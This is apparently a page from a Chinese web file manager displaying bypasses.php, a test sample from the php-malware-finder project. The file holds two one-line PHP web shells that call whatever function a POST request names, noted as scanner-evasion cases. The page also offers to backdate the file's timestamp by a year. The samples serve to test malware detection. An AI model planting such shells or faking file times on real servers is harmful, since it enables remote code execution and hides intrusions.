文件操作 - bypasses.php
返回文件管理
返回主菜单
删除本文件
文件: /root/php-malware-finder/php-malware-finder/samples/artificial/bypasses.php
编辑文件内容
<?php // https://rstforums.com/forum/topic/98500-php-malware-finder/?do=findComment&comment=615687 print_r(call_user_func_array($_POST['functie'], array($_POST['argv']))); // https://github.com/nbs-system/php-malware-finder/commit/47d86bf92eb15fe65dd4efbc04d0004856e88ddd#commitcomment-16355734 print_r($_POST['funct']($_POST['argv']));
修改文件时间
将文件时间修改为当前时间的前一年
删除文件